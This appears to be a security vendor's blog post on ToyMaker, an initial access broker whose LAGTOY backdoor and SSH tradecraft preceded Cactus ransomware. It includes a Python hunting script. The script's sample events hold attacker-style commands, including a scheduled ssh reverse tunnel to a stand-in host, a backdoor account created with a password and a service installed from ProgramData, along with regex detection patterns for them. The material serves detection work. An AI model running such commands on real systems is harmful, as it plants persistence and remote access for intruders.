ToyMaker Activity Detection: Initial Access Brokers Compromise Hosts in Critical Infrastructure Organizations via SSH and File Transfer Utilities

In recent years, the surge in cyber-attacks has been fueled by the expansion of Initial Access Brokers (IABs) that trade access to breached networks. In 2023, security researchers uncovered a widespread breach of critical infrastructure organizations orchestrated by a sophisticated threat group known as “ToyMaker,” which operates as an IAB. The attackers leverage exposed internet-facing systems to gain entry, deploy custom backdoors such as LAGTOY, harvest credentials from the compromised organizations, and quietly hand the access over to a double extortion group.

Detect ToyMaker Attacks

Initial Access Brokers (IABs) have become pivotal players in the cybercrime ecosystem, acting as intermediaries who infiltrate organizations and sell access to other malicious actors, often leading to ransomware attacks. Last year, the number of IAB sales on hacker forums surged by 23% compared to 2023, a rise that correlates with a significant increase in ransomware victims. The observed ToyMaker activity further confirms this trend, highlighting the growing role of IABs in facilitating large-scale cyberattacks.

Register for SOC Prime Platform and access a set of relevant Sigma rules addressing ToyMaker TTPs along with a complete product suite for AI-powered detection engineering, automated threat hunting, and advanced threat detection. Just press the Explore Detections button and immediately drill down to a curated detection stack. 


All the rules are compatible with major SIEM, EDR, and Data Lake solutions, aligned with MITRE ATT&CK®, and enriched with metadata like CTI links, attack timelines, and triage tips.

Additionally, security professionals can hunt for IOCs from the latest Cisco research on ToyMaker. With Uncoder AI, security experts can effortlessly parse these IOCs and transform them into custom queries tailored for the chosen SIEM or EDR platform. Uncoder AI also acts as a non-agentic private AI for threat-informed detection engineering, equipping teams with advanced tools to research, code, validate, translate, and deploy detections on the fly. 

Use Uncoder AI to hunt for IOCs related to ToyMaker’s attacks

ToyMaker Activity Analysis

In 2023, Cisco Talos discovered an extensive compromise of a critical infrastructure enterprise involving a combination of threat actors. From initial access to double extortion, these actors slowly and steadily compromised several hosts in the network. Their tradecraft relied on the coordinated use of SSH and file transfer tools alongside dual-use remote administration utilities to maintain long-term access to the breached network. The IAB behind the initial intrusion, dubbed “ToyMaker,” is assessed to be a financially motivated group that gains entry into high-value targets and then sells that access to secondary threat groups, which typically exploit it for double extortion and ransomware attacks.

Following the initial breach, ToyMaker performed reconnaissance, stole credentials, and deployed its custom backdoor, LAGTOY, before handing the access over to a secondary threat actor. About three weeks later, Cactus ransomware actors were observed accessing the network with the harvested credentials. Although the two groups’ TTPs differ, the timeline points to a clear handoff between ToyMaker and Cactus, so defenders should track both threats separately while recognizing their connection.

During the ToyMaker phase of the intrusion, the adversaries started an SSH listener on a compromised endpoint using Windows OpenSSH. Another infected host then connected to it, spawning “sftp-server.exe” (the OpenSSH SFTP subsystem), which was used to transfer the Magnet RAM Capture memory acquisition tool onto the host. Over the same connection, the attackers downloaded and ran LAGTOY, ToyMaker’s staple custom implant. LAGTOY regularly contacts a hard-coded C2 server to receive commands, executes them on the infected endpoint, and can spawn reverse shells. Installed as a service, it includes basic anti-debugging: it registers a custom unhandled exception filter to detect whether it is running under a debugger and to hinder analysis.

Cactus then maintained long-term access by deploying a range of remote administration tools across endpoints, including eHorus Agent (Pandora RC), AnyDesk, RMS Remote Admin, and Windows OpenSSH. These tools were downloaded from attacker-controlled servers using PowerShell and Impacket.

On other hosts, the attackers used OpenSSH to create reverse shells, setting up scheduled tasks that connected hourly to the C2 server to receive and run commands. On some machines they also added unauthorized user accounts, likely to aid ransomware deployment. Cactus also relies heavily on Metasploit-injected versions of legitimate Windows binaries, such as PuTTY and ApacheBench, to run code on compromised systems.
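The SSH-centric tradecraft described above (an sshd.exe listener handing off to sftp-server.exe or a shell, hourly scheduled tasks that invoke the ssh client, local account creation, and a backdoor installed as a service) can be hunted in process-creation telemetry. The following is an added example written for this page, not SOC Prime, Cisco Talos, or Sigma rule content: the field names are modeled on Sysmon Event ID 1 (parent image, image, command line), the event records are constructed and not real logs, and the fourth rule (a service whose binary lives in a user-writable directory) is a generic heuristic of my own rather than a documented LAGTOY artifact.

```python
"""Hunt for OpenSSH-centric post-exploitation in process-creation events.

Added example, not SOC Prime or Cisco Talos code. Event records are
constructed to resemble Sysmon Event ID 1 fields; none are real telemetry.
"""
import re
from dataclasses import dataclass
from pathlib import PureWindowsPath


@dataclass(frozen=True)
class ProcEvent:
    host: str
    parent_image: str
    image: str
    command_line: str


def basename(path: str) -> str:
    """Case-insensitive file name of a Windows path (works on any OS)."""
    return PureWindowsPath(path).name.lower()


# Rule 1: the Windows OpenSSH server spawning the SFTP subsystem or a shell.
# sshd.exe -> sftp-server.exe is benign where SFTP is expected; baseline it and
# alert on hosts where no SSH server should be listening at all.
def ssh_server_child(ev: ProcEvent) -> bool:
    return basename(ev.parent_image) == "sshd.exe" and basename(ev.image) in {
        "sftp-server.exe", "cmd.exe", "powershell.exe", "pwsh.exe"}


# Rule 2: a scheduled task whose action (/tr) is an ssh client invocation,
# matching the hourly reverse-connection tasks described in the text.
SCHTASK_SSH = re.compile(r"/create\b.*?/tr\b.*?\bssh(\.exe)?\b", re.IGNORECASE)


def scheduled_ssh_task(ev: ProcEvent) -> bool:
    return basename(ev.image) == "schtasks.exe" and bool(SCHTASK_SSH.search(ev.command_line))


# Rule 3: local account creation via net.exe / net1.exe or PowerShell.
NET_USER_ADD = re.compile(r"\buser\b.*?/add\b", re.IGNORECASE)


def local_user_added(ev: ProcEvent) -> bool:
    img = basename(ev.image)
    if img in {"net.exe", "net1.exe"}:
        return bool(NET_USER_ADD.search(ev.command_line))
    return img in {"powershell.exe", "pwsh.exe"} and "new-localuser" in ev.command_line.lower()


# Rule 4 (heuristic, my assumption rather than a documented LAGTOY artifact):
# a new service whose binary lives in a user-writable location.
WRITABLE_DIRS = ("\\users\\", "\\programdata\\", "\\temp\\", "\\windows\\tasks\\")
SC_CREATE = re.compile(r"\bcreate\b.*?\bbinpath=\s*\"?([^\"]+)", re.IGNORECASE)


def service_from_writable_path(ev: ProcEvent) -> bool:
    if basename(ev.image) != "sc.exe":
        return False
    m = SC_CREATE.search(ev.command_line)
    return bool(m) and any(d in m.group(1).lower() for d in WRITABLE_DIRS)


RULES = {
    "sshd_child_process": ssh_server_child,
    "scheduled_ssh_task": scheduled_ssh_task,
    "local_user_added": local_user_added,
    "service_in_writable_path": service_from_writable_path,
}


def evaluate(events):
    """Return (host, rule_name, command_line) for every event/rule match."""
    hits = []
    for ev in events:
        for name, rule in RULES.items():
            if rule(ev):
                hits.append((ev.host, name, ev.command_line))
    return hits


# Constructed sample telemetry (not from the Talos report or any real network).
SAMPLE_EVENTS = [
    ProcEvent("ws-07", r"C:\Windows\System32\OpenSSH\sshd.exe",
              r"C:\Windows\System32\OpenSSH\sftp-server.exe", "sftp-server.exe"),
    ProcEvent("ws-07", r"C:\Windows\System32\OpenSSH\sshd.exe",
              r"C:\Windows\System32\cmd.exe", "cmd.exe"),
    ProcEvent("ws-07", r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\sc.exe",
              r'sc create UpdSvc binPath= "C:\ProgramData\upd\svc.exe" start= auto'),
    ProcEvent("srv-02", r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\schtasks.exe",
              r'schtasks /create /tn Sync /sc hourly /tr "C:\Windows\System32\OpenSSH\ssh.exe '
              r'-N -R 2222:127.0.0.1:22 relay@192.0.2.10"'),
    ProcEvent("srv-02", r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\net.exe",
              "net user backup_svc P@ss123 /add"),
    # Benign noise: an admin's interactive ssh client and a service in System32.
    ProcEvent("adm-01", r"C:\Windows\explorer.exe", r"C:\Windows\System32\OpenSSH\ssh.exe",
              "ssh admin@jump01"),
    ProcEvent("adm-01", r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\sc.exe",
              r'sc create Spooler2 binPath= "C:\Windows\System32\spoolsv.exe"'),
]

if __name__ == "__main__":
    for host, rule, cmd in evaluate(SAMPLE_EVENTS):
        print(f"{host:7} {rule:26} {cmd}")
```

Run against the constructed events, the two admin events produce no hits while the five attacker-style events each trigger exactly one rule. In production the same logic belongs in SIEM queries keyed on the parent/child image pair and command-line regexes; the sshd.exe lineage rule in particular needs an allowlist of hosts where the OpenSSH server is sanctioned, or it will page on every legitimate SFTP transfer.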

With a rise in cyber-attacks orchestrated by IABs and the increasing sophistication of such campaigns that might involve cooperation with double-extortion and ransomware gangs, organizations are seeking effective ways to reduce the risks of intrusions. SOC Prime curates a complete product suite to outscale cyber threats driven by a fusion of technologies with AI, automation, and real-time threat intelligence at its core. 

The post ToyMaker Activity Detection: Initial Access Brokers Compromise Hosts in Critical Infrastructure Organizations via SSH and File Transfer Utilities appeared first on SOC Prime.